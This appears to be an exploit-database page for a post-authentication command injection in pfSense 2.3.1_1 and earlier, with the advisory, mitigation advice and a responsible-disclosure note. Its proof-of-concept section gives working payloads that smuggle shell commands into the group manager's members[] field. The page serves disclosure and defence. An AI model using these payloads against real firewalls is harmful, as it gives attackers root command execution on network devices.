pfSense - exploit.company

vendor:

pfSense

by:

s4squatch (Scott White)

7,5

CVSS

HIGH

Command Injection

CWE

Product Name: pfSense

Affected Version From: 2.3-RELEASE

Affected Version To: 2.3.1_1

Patch Exists: YES

Related CWE: N/A

CPE: pfsense

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2017

pfSense <= 2.3.1_1 Post-Auth Command Execution

pfSense <= 2.3.1_1 is affected by a post-authetication os command injection vulnerability in auth.inc via the /system_groupmanager.php page (System menu-->User Manager-->Groups) in the handling of the members[] parameter. This allows an authenticated WebGUI user with privileges for system_groupmanager.php to execute commands in the context of the root user.

Mitigation:

Upgrade to the latest version of pfSense (2.3.1_5 on is fixed). This may be performed in the web interface or from the console. Furthermore, the issues can be mitigated by restricting access to the firewall GUI both with firewall rules and by not allowing untrusted users to have accounts with GUI access, and by not granting untrusted administrators access to the pages in question.

Source

Exploit-DB raw data:

# Exploit Title: pfSense <= 2.3.1_1 Post-Auth Command Execution
# Date: 11-06-2017
# Exploit Author: s4squatch (Scott White - www.trustedsec.com)
# Vendor Homepage: https://www.pfsense.org
# Version: 2.3-RELEASE
# Vendor Security Advisory:  https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc

1. Description
pfSense <= 2.3.1_1 is affected by a post-authetication os command injection vulnerability in auth.inc via the /system_groupmanager.php page (System menu-->User Manager-->Groups) in the handling of the members[] parameter.  This allows an authenticated WebGUI user with
privileges for system_groupmanager.php to execute commands in the context of the root user.

2. Proof of Concept
'`ifconfig>/usr/local/www/ifconfig.txt`'
'`whoami>/usr/local/www/whoami.txt`'

Command output can then be viewed at the webroot:
http://<address>/ifconfig.txt
http://<address>/whoami.txt

Another POC:  0';/sbin/ping -c 10 192.168.1.125;'

3.  Solution
Upgrade to the latest version of pfSense (2.3.1_5 on is fixed). This may be performed in the web interface or from
the console.  See https://doc.pfsense.org/index.php/Upgrade_Guide  Furthermore, the issues can be mitigated by restricting access to the firewall GUI both with firewall rules and by not allowing untrusted users to have accounts with GUI access, and by not granting untrusted administrators access to the pages in question.

Issue was responsibly disclosed to pfSense (security@pfsense.org) on 06/08/2016 and fixed 06/09/2016!
Thank you to Jim P and the pfSense team for the impressive response time.